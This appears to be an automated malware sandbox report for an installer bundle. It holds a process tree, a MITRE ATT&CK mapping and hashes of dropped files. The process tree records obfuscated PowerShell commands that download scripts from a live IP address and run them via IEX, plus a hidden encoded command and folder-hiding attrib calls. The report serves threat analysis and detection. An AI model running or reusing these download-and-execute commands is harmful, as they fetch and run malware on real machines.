                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 220 -s 440
                                                                                                                              1⤵
                                                                                                                              • Program crash
                                                                                                                              PID:1628
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 224 -s 432
                                                                                                                              1⤵
                                                                                                                              • Program crash
                                                                                                                              PID:1044
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1544 -s 440
                                                                                                                              1⤵
                                                                                                                              • Program crash
                                                                                                                              PID:2844
                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                                                                                                                              1⤵
                                                                                                                                PID:1836
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1544 -ip 1544
                                                                                                                                1⤵
                                                                                                                                  PID:2204
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 224 -ip 224
                                                                                                                                  1⤵
                                                                                                                                    PID:4056
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 220 -ip 220
                                                                                                                                    1⤵
                                                                                                                                      PID:1300
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 208 -ip 208
                                                                                                                                      1⤵
                                                                                                                                        PID:504
                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                                                                                                                                        1⤵
                                                                                                                                          PID:5256
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                                                                                                                                          1⤵
                                                                                                                                            PID:5348
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\system32\cmd.exe" /c attrib +s +h C:\Users\Admin\AppData\Roaming\OneDrive
                                                                                                                                              2⤵
                                                                                                                                                PID:3720
                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                  attrib +s +h C:\Users\Admin\AppData\Roaming\OneDrive
                                                                                                                                                  3⤵
                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                  PID:1568
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 220 -ip 220
                                                                                                                                              1⤵
                                                                                                                                                PID:5408
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 224 -ip 224
                                                                                                                                                1⤵
                                                                                                                                                  PID:5452
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1544 -ip 1544
                                                                                                                                                  1⤵
                                                                                                                                                    PID:5420
                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
                                                                                                                                                    1⤵
                                                                                                                                                      PID:5124
                                                                                                                                                      • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                        "C:\Windows\System32\svchost.exe"
                                                                                                                                                        2⤵
                                                                                                                                                          PID:6072
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6072 -s 496
                                                                                                                                                            3⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            PID:5464
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1544 -s 448
                                                                                                                                                        1⤵
                                                                                                                                                        • Program crash
                                                                                                                                                        PID:5572
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 220 -s 432
                                                                                                                                                        1⤵
                                                                                                                                                        • Program crash
                                                                                                                                                        PID:5540
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 3568 -ip 3568
                                                                                                                                                        1⤵
                                                                                                                                                          PID:5868
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 208 -ip 208
                                                                                                                                                          1⤵
                                                                                                                                                            PID:6108
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 208 -ip 208
                                                                                                                                                            1⤵
                                                                                                                                                              PID:5428
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 208 -ip 208
                                                                                                                                                              1⤵
                                                                                                                                                                PID:5600
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 3324 -ip 3324
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:3772
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 208 -ip 208
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:5484
                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 4952 -ip 4952
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:1824
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 208 -ip 208
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:2368
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 208 -ip 208
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:5992
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:2280
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 5380 -ip 5380
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:4192
                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 6072 -ip 6072
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:3364
                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 208 -ip 208
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:5668
                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 3568 -ip 3568
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:3624
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 3568 -ip 3568
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:3040
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 3568 -ip 3568
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:1592

                                                                                                                                                                                      Network

                                                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                      Execution

                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                      1
                                                                                                                                                                                      T1053

                                                                                                                                                                                      Persistence

                                                                                                                                                                                      Modify Existing Service

                                                                                                                                                                                      2
                                                                                                                                                                                      T1031

                                                                                                                                                                                      New Service

                                                                                                                                                                                      1
                                                                                                                                                                                      T1050

                                                                                                                                                                                      Hidden Files and Directories

                                                                                                                                                                                      2
                                                                                                                                                                                      T1158

                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                      1
                                                                                                                                                                                      T1053

                                                                                                                                                                                      Privilege Escalation

                                                                                                                                                                                      New Service

                                                                                                                                                                                      1
                                                                                                                                                                                      T1050

                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                      1
                                                                                                                                                                                      T1053

                                                                                                                                                                                      Defense Evasion

                                                                                                                                                                                      Modify Registry

                                                                                                                                                                                      2
                                                                                                                                                                                      T1112

                                                                                                                                                                                      Disabling Security Tools

                                                                                                                                                                                      1
                                                                                                                                                                                      T1089

                                                                                                                                                                                      Hidden Files and Directories

                                                                                                                                                                                      2
                                                                                                                                                                                      T1158

                                                                                                                                                                                      Install Root Certificate

                                                                                                                                                                                      1
                                                                                                                                                                                      T1130

                                                                                                                                                                                      Credential Access

                                                                                                                                                                                      Credentials in Files

                                                                                                                                                                                      1
                                                                                                                                                                                      T1081

                                                                                                                                                                                      Discovery

                                                                                                                                                                                      Query Registry

                                                                                                                                                                                      2
                                                                                                                                                                                      T1012

                                                                                                                                                                                      System Information Discovery

                                                                                                                                                                                      3
                                                                                                                                                                                      T1082

                                                                                                                                                                                      Peripheral Device Discovery

                                                                                                                                                                                      1
                                                                                                                                                                                      T1120

                                                                                                                                                                                      Collection

                                                                                                                                                                                      Data from Local System

                                                                                                                                                                                      1
                                                                                                                                                                                      T1005

                                                                                                                                                                                      Command and Control

                                                                                                                                                                                      Web Service

                                                                                                                                                                                      1
                                                                                                                                                                                      T1102

                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                      Downloads

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\libcurl.dll
                                                                                                                                                                                        MD5

                                                                                                                                                                                        d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\libcurl.dll
                                                                                                                                                                                        MD5

                                                                                                                                                                                        d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\libcurl.dll
                                                                                                                                                                                        MD5

                                                                                                                                                                                        d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\libcurlpp.dll
                                                                                                                                                                                        MD5

                                                                                                                                                                                        e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\libcurlpp.dll
                                                                                                                                                                                        MD5

                                                                                                                                                                                        e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\libgcc_s_dw2-1.dll
                                                                                                                                                                                        MD5

                                                                                                                                                                                        9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\libgcc_s_dw2-1.dll
                                                                                                                                                                                        MD5

                                                                                                                                                                                        9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\libstdc++-6.dll
                                                                                                                                                                                        MD5

                                                                                                                                                                                        5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\libstdc++-6.dll
                                                                                                                                                                                        MD5

                                                                                                                                                                                        5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\libwinpthread-1.dll
                                                                                                                                                                                        MD5

                                                                                                                                                                                        1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\libwinpthread-1.dll
                                                                                                                                                                                        MD5

                                                                                                                                                                                        1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\setup_install.exe
                                                                                                                                                                                        MD5

                                                                                                                                                                                        daf05c5515261df2d131996f015c9342

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        0067d63a31f84ccc3785b612b5ce28eff4966d89

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        0a966cb7b8e326bf3aae9bf6024d627f5110f1c6ea3d1e855f78876a477b8ee2

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        efd9b6938e5bb922b37eee722e5f6110c5430152f1a288e41f14b71957269178dc64b932dd3fee3883850f1f3efe09f2d943625e069cb786219e85b4dfbb90e4

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\setup_install.exe
                                                                                                                                                                                        MD5

                                                                                                                                                                                        daf05c5515261df2d131996f015c9342

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        0067d63a31f84ccc3785b612b5ce28eff4966d89

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        0a966cb7b8e326bf3aae9bf6024d627f5110f1c6ea3d1e855f78876a477b8ee2

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        efd9b6938e5bb922b37eee722e5f6110c5430152f1a288e41f14b71957269178dc64b932dd3fee3883850f1f3efe09f2d943625e069cb786219e85b4dfbb90e4

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\sonia_1.exe
                                                                                                                                                                                        MD5

                                                                                                                                                                                        6e487aa1b2d2b9ef05073c11572925f2

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        b2b58a554b75029cd8bdf5ffd012611b1bfe430b

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        77eec57eba8ad26c2fd97cc4240a13732f301c775e751ee72079f656296d9597

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        b7512fcf5dcfbe1c1807d85dfff39bd0cac57adf2696b7129a8c9d70ea7f8249c301a97ecba0f190eb622a216530215585ce6d8d8ce9b112e5728792ecace739

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\sonia_1.txt
                                                                                                                                                                                        MD5

                                                                                                                                                                                        6e487aa1b2d2b9ef05073c11572925f2

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        b2b58a554b75029cd8bdf5ffd012611b1bfe430b

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        77eec57eba8ad26c2fd97cc4240a13732f301c775e751ee72079f656296d9597

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        b7512fcf5dcfbe1c1807d85dfff39bd0cac57adf2696b7129a8c9d70ea7f8249c301a97ecba0f190eb622a216530215585ce6d8d8ce9b112e5728792ecace739

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\sonia_2.exe
                                                                                                                                                                                        MD5

                                                                                                                                                                                        d44db4928a482b253d9a36a54f7aaaa1

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        4dc92bd6080d3e569e1bd4f86ba1c17fb5acbd74

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        61ab7c2f658a4c9739b3f9529dc7e346142637e74a031f62f3c2ccd7eadd9ab6

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        211fd320441cfc2efc92c4597153fa3086ebec13193e6ce1c08bfc407a9aa1592d203daec376462247797067d73c34b697155db40e0afffecef7136dc68dd29c

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\sonia_2.txt
                                                                                                                                                                                        MD5

                                                                                                                                                                                        d44db4928a482b253d9a36a54f7aaaa1

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        4dc92bd6080d3e569e1bd4f86ba1c17fb5acbd74

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        61ab7c2f658a4c9739b3f9529dc7e346142637e74a031f62f3c2ccd7eadd9ab6

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        211fd320441cfc2efc92c4597153fa3086ebec13193e6ce1c08bfc407a9aa1592d203daec376462247797067d73c34b697155db40e0afffecef7136dc68dd29c

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\sonia_3.exe
                                                                                                                                                                                        MD5

                                                                                                                                                                                        523fc393dd902e3576c961b143d80226

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        c462b35f34b215377cec946cc48b7f92cd771b62

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        f611aa33df20817aa06aaad16faa90761be424f9237c16c66627efe3f3f67c07

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        3ae008df16e8b17643c17f14cfddfdda991fa3b5da0340d9a8115554e45ec9c65d90c050d31c82664dfded828910a7edc55f8018c1d07a99886cf40af66728cf

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\sonia_3.txt
                                                                                                                                                                                        MD5

                                                                                                                                                                                        523fc393dd902e3576c961b143d80226

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        c462b35f34b215377cec946cc48b7f92cd771b62

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        f611aa33df20817aa06aaad16faa90761be424f9237c16c66627efe3f3f67c07

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        3ae008df16e8b17643c17f14cfddfdda991fa3b5da0340d9a8115554e45ec9c65d90c050d31c82664dfded828910a7edc55f8018c1d07a99886cf40af66728cf

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\sonia_4.exe
                                                                                                                                                                                        MD5

                                                                                                                                                                                        5668cb771643274ba2c375ec6403c266

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        dd78b03428b99368906fe62fc46aaaf1db07a8b9

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\sonia_4.txt
                                                                                                                                                                                        MD5

                                                                                                                                                                                        5668cb771643274ba2c375ec6403c266

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        dd78b03428b99368906fe62fc46aaaf1db07a8b9

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\sonia_5.exe
                                                                                                                                                                                        MD5

                                                                                                                                                                                        6c3e0a1c839e28ca5b7c12695bd50c9d

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        f3c2177fabb8dee68cad911a56e221bae930a12f

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        2a1feb403763df26a3c2be574e79c8743ecb40d169cfbee3fbcd87fe15baca12

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        980940730f8227de7337cd698aa9aa41eb8581dad02ad0e9c3ca0586fc94245e3892ce8d9d84b1d312eebe6576faf0e1872994d32a75e7706589afd68189af53

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\sonia_5.txt
                                                                                                                                                                                        MD5

                                                                                                                                                                                        6c3e0a1c839e28ca5b7c12695bd50c9d

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        f3c2177fabb8dee68cad911a56e221bae930a12f

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        2a1feb403763df26a3c2be574e79c8743ecb40d169cfbee3fbcd87fe15baca12

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        980940730f8227de7337cd698aa9aa41eb8581dad02ad0e9c3ca0586fc94245e3892ce8d9d84b1d312eebe6576faf0e1872994d32a75e7706589afd68189af53

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\sonia_6.exe
                                                                                                                                                                                        MD5

                                                                                                                                                                                        987d0f92ed9871031e0061e16e7bbac4

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        b69f3badc82b6da0ff311f9dc509bac244464332

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        adb98685d3d6a8fa5e90b6fd9d458601d874718d5815f8aab66728ba9d067440

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        f4ecf0bd996fd9aab99eba225bed9dbe2af3f8857a32bc9f0eda2c2fe8b468f5f853e68e96c029cf4cfd161409e072777db92a7502b58b541e0057b449f79770

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC127940D\sonia_6.txt
                                                                                                                                                                                        MD5

                                                                                                                                                                                        987d0f92ed9871031e0061e16e7bbac4

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        b69f3badc82b6da0ff311f9dc509bac244464332

